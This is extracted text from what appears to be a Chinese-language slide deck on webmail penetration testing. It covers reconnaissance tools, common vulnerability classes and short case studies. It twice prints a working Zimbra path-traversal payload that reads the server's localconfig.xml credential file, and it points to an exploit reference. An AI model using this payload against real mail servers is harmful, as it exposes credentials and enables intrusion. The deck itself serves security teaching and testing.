webmailhacking.pptVIP

测试站点： 测试代码： /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 查看版本：/help/zh_CN/standard/version.htm * /exploits/26009/ * WebmailHacking 千域千寻 总目录 webmail的定义 国内常用企业邮箱 常用企业邮箱漏洞 webmail渗透测试流程 信息收集 webmail常见的漏洞类型 案例说明 webmail防御 总结 什么是webmail webmail：WebMail是一个基于Web的电子邮件收发系统，扮演邮件用户代理角色，一般而言，WebMail系统提供邮件收发、用户在线服务和系统服务管理等功能。 WebMail的界面直观、友好，不需要借助客户端，免除了用户对E-mail客户软件（如：Foxmail、Outlook等）进行配置时的麻烦，只要能上网就能使用WebMail，方便用户对邮件进行接收和发送。WebMail使得E-mail在Internet上的应用广泛。 WebMail与Foxmail、Outlook等客户端软件比较，有如下优点： （1）只要计算机能连上网络，便可随时随地转发邮件。 （2）在WebMail中可以修改密码，设置自动转发、自动回复等。 （3）在WebMail中可以了解邮箱已使用容量，及时清理不需要的邮件，防止邮箱爆满。 （4）邮件发送速度比通过Foxmail、Outlook Express等软件快捷 引用自：搜狗百科 /htm 国内常用企业邮箱 常用企业邮箱漏洞 webmail渗透测试流程 常用的CLI下的邮箱收集工具 theharvester Jenny search_email_collector 基于搜索引擎定位webmail SHODAN ZoomEye 基于开源代码托管平台搜索 Github 由于开发人员安全意识的不足导致内部邮箱信息及个人信息泄露。(目前github由于某些不可描述的原因导致无法继续搜索相关邮箱密码等敏感信息) webmail测试手段 webmail常见的漏洞类型 webmail CSRF XSS RCE LFI/RFI Other RCE 案例说明【一】 QQ邮箱Self-XSS 案例说明【二】 Zimbra本地文件包含 案例说明【三】 atmail本地文件包含 案例说明【四】 AfterLogic WebMail Lite PHP 7.0.1 - CSRF Vulnerability 案例说明【五】 webmail与钓鱼攻击 在horde webmail 5.1版本存在开放性重定向漏洞，可以被用来恶意钓鱼。一个简单的案例： 测试站点： 测试代码： /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00 查看版本：/help/zh_CN/standard/version.htm * /exploits/26009/ *